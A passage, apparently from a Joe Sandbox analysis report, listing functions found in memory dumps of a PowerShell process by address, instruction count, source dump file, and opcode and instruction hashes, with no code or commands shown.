                                                                                          • Opcode Fuzzy Hash: 27df42068e36d7124d1d21670a75a1540d3bab83501d6f6ef82e1641b2e4fe48
                                                                                          • Instruction Fuzzy Hash: 73012D7240D3809FD7128B259D94752BFA8EF47624F1984DBD9848F197C2685845C772
                                                                                          Function 0313D01D Relevance: .0, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2447762710.000000000313D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0313D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_313d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 49ec70730caa95611aa750ace8aa7000d6817c5fc3021be6270a1ebefa3b8da3
                                                                                          • Instruction ID: a29938503b470b7ce4b559f72081cab5f7cd460139b3823d911c0bd0827ffb34
                                                                                          • Opcode Fuzzy Hash: 49ec70730caa95611aa750ace8aa7000d6817c5fc3021be6270a1ebefa3b8da3
                                                                                          • Instruction Fuzzy Hash: C101F2724043409BE7148A25E984BA7FF98DF4AB74F1CC05AED485A242CBB89881CAB1
                                                                                          Function 04A7F7C1 Relevance: .0, Instructions: 41COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1424e6571717a63882e441bd0cfa101fa5c1ad49a1bacf4e4331cc8e2d776f76
                                                                                          • Instruction ID: bef8de5423087c05e1422920bb2b9b5a13e4883fc4d9e05a8b5764d61703fa55
                                                                                          • Opcode Fuzzy Hash: 1424e6571717a63882e441bd0cfa101fa5c1ad49a1bacf4e4331cc8e2d776f76
                                                                                          • Instruction Fuzzy Hash: 2601E571D1074AAFCB44CFA4C9546EEFBB5FF9A300F24471EE015A6611EBB02686CB80
                                                                                          Function 04A77958 Relevance: .0, Instructions: 41COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ae10dd28f503488ebd7c6944eb60d36aa420538c987813f81eb60965e9f6a62c
                                                                                          • Instruction ID: d04ea433931d76e57907c6bcbde7aa524832af6d08f94934755ab1780c8ad41e
                                                                                          • Opcode Fuzzy Hash: ae10dd28f503488ebd7c6944eb60d36aa420538c987813f81eb60965e9f6a62c
                                                                                          • Instruction Fuzzy Hash: 57F046317063409FDB21AB689C5496F7BE8DB892247000A9EE09AD7753CE607C4183A0
                                                                                          Function 04A7CB62 Relevance: .0, Instructions: 39COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a073ebbd71b7af83737d0c282d6d3e7ef29bc5b95c70bc141f0e7122fdeee81d
                                                                                          • Instruction ID: d70f3990259fc9a68bc5378147c643b8961ef70c7741f247ab97d0cdd03a3816
                                                                                          • Opcode Fuzzy Hash: a073ebbd71b7af83737d0c282d6d3e7ef29bc5b95c70bc141f0e7122fdeee81d
                                                                                          • Instruction Fuzzy Hash: 29F0E9312063406FD35A932C5C90CAE7FA6DEC71503184ABED089CB651CE280C068771
                                                                                          Function 04A790E0 Relevance: .0, Instructions: 37COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2019d31ca00251c6e99e7b3f5b268559eb0beeab22935cb45baf12da4eeecdad
                                                                                          • Instruction ID: 9356a41c7cb11b04b7241d303851119d42170f7de614007d70c59327376f0656
                                                                                          • Opcode Fuzzy Hash: 2019d31ca00251c6e99e7b3f5b268559eb0beeab22935cb45baf12da4eeecdad
                                                                                          • Instruction Fuzzy Hash: 76F0F6756093449FE305EB38C4187AB7BA5EFC6324F5481AFC4158B392CE396C06CBA1
                                                                                          Function 0313D9A7 Relevance: .0, Instructions: 37COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2447762710.000000000313D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0313D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_313d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ad6c415ce0ccc88b937b7130959f112e20fff23899fb807156686d139a1d97b4
                                                                                          • Instruction ID: 81223c3690f4d3a1540ab1296b5bd633ba1e6c0cfdd812c71f01b8d9b2077f6a
                                                                                          • Opcode Fuzzy Hash: ad6c415ce0ccc88b937b7130959f112e20fff23899fb807156686d139a1d97b4
                                                                                          • Instruction Fuzzy Hash: 39F0F976200604AFD724CF0AD985C23FBADEFD5670719C55AE84A8B611C771EC42CBA0
                                                                                          Function 04A7DE40 Relevance: .0, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b53473cc66c30b4a1beb1c44860be8e24056ce9311ec05d690fa25a06fdff27e
                                                                                          • Instruction ID: a318c0c6a4582bf510f24be2013deebfba4fca8d87a5ed0efdc8c271e965c01d
                                                                                          • Opcode Fuzzy Hash: b53473cc66c30b4a1beb1c44860be8e24056ce9311ec05d690fa25a06fdff27e
                                                                                          • Instruction Fuzzy Hash: 66F082353041409FC7118F2DD894CA6BBF6AFCA31532910DEE585DB332DA61DC02CB50
                                                                                          Function 04A7F7D0 Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e9ab9eff2ad12a6eb978bd35172271f40910a8a4c656844adf77144f64235939
                                                                                          • Instruction ID: e5d7731770b25309a03155d392299f6e83021f4c733496bffb8ea625bba1985f
                                                                                          • Opcode Fuzzy Hash: e9ab9eff2ad12a6eb978bd35172271f40910a8a4c656844adf77144f64235939
                                                                                          • Instruction Fuzzy Hash: 3801DD71D1074ADBCB04CFE4C8546EEFBB4FF99300F20472AE015A6600EBB02686CB80
                                                                                          Function 04A79160 Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ab6b180aa6b01432958e570c902080600158102ac86ebfbf6326fde71213240f
                                                                                          • Instruction ID: 34e2b810979fbe723f4707f7aecc085dcf2e12e8a57a76b922b180317ceeff6a
                                                                                          • Opcode Fuzzy Hash: ab6b180aa6b01432958e570c902080600158102ac86ebfbf6326fde71213240f
                                                                                          • Instruction Fuzzy Hash: 48F0547450A3445FD7659B78D89C797BFF4EB46310F0444AEE54DC7292CB356884CB60
                                                                                          Function 04A77968 Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ef2a075cd8dddf5a58101c17c37f76813dffea340a3f234cbf5502fd50b2ded0
                                                                                          • Instruction ID: e97d1e2c064d02a16dea32f1a704e207f324970acd2245f1025470c75e4d58b1
                                                                                          • Opcode Fuzzy Hash: ef2a075cd8dddf5a58101c17c37f76813dffea340a3f234cbf5502fd50b2ded0
                                                                                          • Instruction Fuzzy Hash: F7F0A0357007149FDB24AB6EE884A6FBBE9EBC8261B00092DE14AC7750DF70AC0187A4
                                                                                          Function 0313D998 Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2447762710.000000000313D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0313D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_313d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c511f1c7246a5105a34fe7d9b18a6f25fe10116c865350da8ae6fbfdef0dc443
                                                                                          • Instruction ID: d7150ec786bb2c9b769f424ecd7bc28dd4c563d8c02d7e5d18511e596d591256
                                                                                          • Opcode Fuzzy Hash: c511f1c7246a5105a34fe7d9b18a6f25fe10116c865350da8ae6fbfdef0dc443
                                                                                          • Instruction Fuzzy Hash: 4BF01D75100A40AFD725CF06CD85D23BBB9EF89670B1A8589E85A8B712C771FC42CF60
                                                                                          Function 04A77697 Relevance: .0, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0ffce5942f4d9195a872f8c9ae004eaf426957e642c1c88f42cc25521f9678a9
                                                                                          • Instruction ID: 7514486df2cd13170d62f43630f20e5661bae90f6ef2bf349aa7dc2f9a956c6f
                                                                                          • Opcode Fuzzy Hash: 0ffce5942f4d9195a872f8c9ae004eaf426957e642c1c88f42cc25521f9678a9
                                                                                          • Instruction Fuzzy Hash: 3BF0303D7001188FCB10DBBDD884A9ABBE2EBCD6557154169F609CB319DF64EC018FA1
                                                                                          Function 04A790F0 Relevance: .0, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 558c1c7bc04498af528c731a0ae902bdadb349cfa49f6adbcbf3b2aa010d7a97
                                                                                          • Instruction ID: ac32c11f85941a04a418449545af3f8d5b1630638a5d62488d378965f172c84d
                                                                                          • Opcode Fuzzy Hash: 558c1c7bc04498af528c731a0ae902bdadb349cfa49f6adbcbf3b2aa010d7a97
                                                                                          • Instruction Fuzzy Hash: 2BF020796046048BE300AB78C0187AB77E6EFC6328F10812EC91A4B384DF3A7C05CBE0
                                                                                          Function 04A7DC90 Relevance: .0, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bb8bf9b2b676b4aeceac42a6fd1dc3874e39ae6a0d255e41c5db66323e86069c
                                                                                          • Instruction ID: 77c09dd149305f38a3d140459b156501bb38991075b94a5e577cac75c7a2d868
                                                                                          • Opcode Fuzzy Hash: bb8bf9b2b676b4aeceac42a6fd1dc3874e39ae6a0d255e41c5db66323e86069c
                                                                                          • Instruction Fuzzy Hash: F6F0E53520A7C06BC327973DAC10C9F7FAADEC6271304059EE055DB212CA95D806C7F6
                                                                                          Function 04A79549 Relevance: .0, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 47777c928017c2510f64c6133a585ddbaea98df55566e9a75898055643a7c673
                                                                                          • Instruction ID: 6883c7c83b08926e665f7f197e120ff362168190561625f0c6da2f6cebfc9751
                                                                                          • Opcode Fuzzy Hash: 47777c928017c2510f64c6133a585ddbaea98df55566e9a75898055643a7c673
                                                                                          • Instruction Fuzzy Hash: F4E068927061701EAB7023B81D146BB4E8E9FCB571B1503BF8441EB2C2DC48DC0E43B2
                                                                                          Function 04A7DE50 Relevance: .0, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b341300c656981cee2270a19989a29d58b14f8a29a01bc20404b8bad6f30e0a1
                                                                                          • Instruction ID: 120e04421e865a794915f6bde34bf7ba28c138b201d85bc81d142d37b721025d
                                                                                          • Opcode Fuzzy Hash: b341300c656981cee2270a19989a29d58b14f8a29a01bc20404b8bad6f30e0a1
                                                                                          • Instruction Fuzzy Hash: DFE01A353001108F87109F1ED898C6AB7FAEFDE76576910AAEA49DB331DA71EC01CB90
                                                                                          Function 04A7DCE1 Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0fa15880809eb56fe55743de452e7e4658da7e83b98afd49fa03f173fdf18256
                                                                                          • Instruction ID: 29690fc6b9d4df90a1ad3969ffbbdc374f05d5bfd91639af82b96fe05962f3ff
                                                                                          • Opcode Fuzzy Hash: 0fa15880809eb56fe55743de452e7e4658da7e83b98afd49fa03f173fdf18256
                                                                                          • Instruction Fuzzy Hash: 84E02B31705190B78B19C26DD8448FBFF75DFC9320F04817EE806A7200DA316416D6E0
                                                                                          Function 04A7896A Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c4ea273d3900e59c4b839572469ae5e8f6d1d5e6fc59db4547616bcaf414a7a5
                                                                                          • Instruction ID: 820a56b647962b11c0432f3569db35fe2e09d524e536c555556b6013c84158fb
                                                                                          • Opcode Fuzzy Hash: c4ea273d3900e59c4b839572469ae5e8f6d1d5e6fc59db4547616bcaf414a7a5
                                                                                          • Instruction Fuzzy Hash: D2F0E53430D7D05BCB0B6774A81C5AE7FA5ABC6325F0401AFD506CB243CF680809D7A5
                                                                                          Function 04A7AF98 Relevance: .0, Instructions: 28COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a4f52b69e5b36cd3e5e6529b69e9813306ea4e6463dab5931a98155dde0b0900
                                                                                          • Instruction ID: fbc284948a0d2497432724b94221ba323023e0ff571192d1d32389a971444544
                                                                                          • Opcode Fuzzy Hash: a4f52b69e5b36cd3e5e6529b69e9813306ea4e6463dab5931a98155dde0b0900
                                                                                          • Instruction Fuzzy Hash: 84E0922630E2D12A8B26433D68504AAAF768AC722130D85FAE084CB287D8529C068321
                                                                                          Function 04A7CB78 Relevance: .0, Instructions: 27COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7d96b63c891635df9d862a21c325c664d0a38f43c4d2b39cbf022d1e945c4731
                                                                                          • Instruction ID: 25253251a871b38ea959fd2cf12fe3d10656e177c0569ec264aa7a6605aeca8f
                                                                                          • Opcode Fuzzy Hash: 7d96b63c891635df9d862a21c325c664d0a38f43c4d2b39cbf022d1e945c4731
                                                                                          • Instruction Fuzzy Hash: 8CE0DF322003001B8268F36EAC81C6EBACAEFCA1613588D7DC20E9BB40DE746C0147A4
                                                                                          Function 04A79170 Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 93ee80438203a19376929f2bb84dd4796a39e59b6d0524e3f0c58c76ba77e3c3
                                                                                          • Instruction ID: 3676d19188eb1b30ddfe89820d33ebf035aa1d2c3bc8c4becf1b8c0eb50543bd
                                                                                          • Opcode Fuzzy Hash: 93ee80438203a19376929f2bb84dd4796a39e59b6d0524e3f0c58c76ba77e3c3
                                                                                          • Instruction Fuzzy Hash: 56F06D749013048BD760DFB8D89C79B7BE9EB44360F00482DE51EC7240DB396884CB90
                                                                                          Function 04A78978 Relevance: .0, Instructions: 24COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dfd7386ebb0bffe308510cc3fc4915c33fc0a26aa907d39adc1eee1d7382edb0
                                                                                          • Instruction ID: 3bd92263a8f94b5964b44a47fa8518e75920cb394a26ebc0afc4d2444c5cff77
                                                                                          • Opcode Fuzzy Hash: dfd7386ebb0bffe308510cc3fc4915c33fc0a26aa907d39adc1eee1d7382edb0
                                                                                          • Instruction Fuzzy Hash: CFE0263530861087CF0A3B74A40C2AE7A9AEBC9766F00002ED60683342CF785805E7D9
                                                                                          Function 04A79558 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2b5d73ef63b61407708a0ec0e0168abb02aa2b511af1bcee9d72ec2f8474ce29
                                                                                          • Instruction ID: 58643458c182771e559eab094dc06158012ddd62435e983505ca1d482f9fc93e
                                                                                          • Opcode Fuzzy Hash: 2b5d73ef63b61407708a0ec0e0168abb02aa2b511af1bcee9d72ec2f8474ce29
                                                                                          • Instruction Fuzzy Hash: 39D05E527411350B6A7432AA1E146BBA9CFDFCA4A6B25003A9A05D7281EC4CFC0A03F1
                                                                                          Function 04A7DCA0 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 75c1aae82a442b6f20725a5178a5f2b3bf3aab7003840fde9d74d50a4a6bed50
                                                                                          • Instruction ID: c9eadd316456cddc6fed880c8aba8554b4ff3b5ecfa309c4fa72d827f3bf2e04
                                                                                          • Opcode Fuzzy Hash: 75c1aae82a442b6f20725a5178a5f2b3bf3aab7003840fde9d74d50a4a6bed50
                                                                                          • Instruction Fuzzy Hash: C1E0C235700710478725AB6EA80089F7BDFDFC9672350442EE019DB304DFA4EC0647D5
                                                                                          Function 04A7DCF0 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                          • Instruction ID: 43119f4929e099de0fcbb002bb942257d7c2b84ac69aa590ab062cad8d2d8ac8
                                                                                          • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                          • Instruction Fuzzy Hash: F4E08C32B00018A78B1896A9D8504E9FBBADFCC220F14847ED90AA7340EA32691686E1
                                                                                          Function 04A7C590 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c256f6fd0dfe4e76f08b1550970340d752079ec2d8229742ff5bd03b766e9b76
                                                                                          • Instruction ID: 8273287313a9ccf57a98e58f65a2cb89f178c57c1c8cd5020bf39f6b1afe519c
                                                                                          • Opcode Fuzzy Hash: c256f6fd0dfe4e76f08b1550970340d752079ec2d8229742ff5bd03b766e9b76
                                                                                          • Instruction Fuzzy Hash: 10E026353042905F8740637CA8188AABBE6EFD6262304006FE049C7282DA108C148B64
                                                                                          Function 04A78739 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 819a9a2aed16f7cc120c19ef027c33ce04faf5692f2c73f3368bfceeb2948629
                                                                                          • Instruction ID: 420910d9188bcb547ea26850c0b52116e36be24e51b7c01ad6385a43c009c33f
                                                                                          • Opcode Fuzzy Hash: 819a9a2aed16f7cc120c19ef027c33ce04faf5692f2c73f3368bfceeb2948629
                                                                                          • Instruction Fuzzy Hash: 2EE04F7191514AABCF0AABB4EC5E8EEBF74EA05301F40019DEA5752192EA61594ECFC0
                                                                                          Function 04A78800 Relevance: .0, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e13b33bbc76878ceb1353d32663a77ecc2ff27d1eaa8fefc76606b8307a9bced
                                                                                          • Instruction ID: e4acc2c0c157d60a67a6c546c26c3203cb44feb56105c42df2997ebfe09f1569
                                                                                          • Opcode Fuzzy Hash: e13b33bbc76878ceb1353d32663a77ecc2ff27d1eaa8fefc76606b8307a9bced
                                                                                          • Instruction Fuzzy Hash: DFE0D8309192466BCB45EBB8D40A87FBFB0EB45300F00429EEC0597307D6304805DF81
                                                                                          Function 04A7F860 Relevance: .0, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b2a223052260185e6f04f8cd892ef45cc89418d2faa394edd00eb37494ac4206
                                                                                          • Instruction ID: 60c9e38a44f1865d210dc91936670db6a60b23773e658e33697fce304f350e66
                                                                                          • Opcode Fuzzy Hash: b2a223052260185e6f04f8cd892ef45cc89418d2faa394edd00eb37494ac4206
                                                                                          • Instruction Fuzzy Hash: 58E01A70D0024A9F8740EFE8C88215DFBF0AB49210B50C1AAC958EB201E6369642CBD2
                                                                                          Function 04A7C5A0 Relevance: .0, Instructions: 18COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0f4f769edf4cd68d3ae1fbc0ff19e98d68a4d6ba163023485fdfaa587e8f9b74
                                                                                          • Instruction ID: 647f16d6afbbdc73856a5f9d7beeffec741828fb07fd41ebac5434206ec22e4a
                                                                                          • Opcode Fuzzy Hash: 0f4f769edf4cd68d3ae1fbc0ff19e98d68a4d6ba163023485fdfaa587e8f9b74
                                                                                          • Instruction Fuzzy Hash: B1D0A7353003105B4204679DB41495977DAEBC9572300003EE60DC3340DE219C159BE4
                                                                                          Function 04A7F870 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
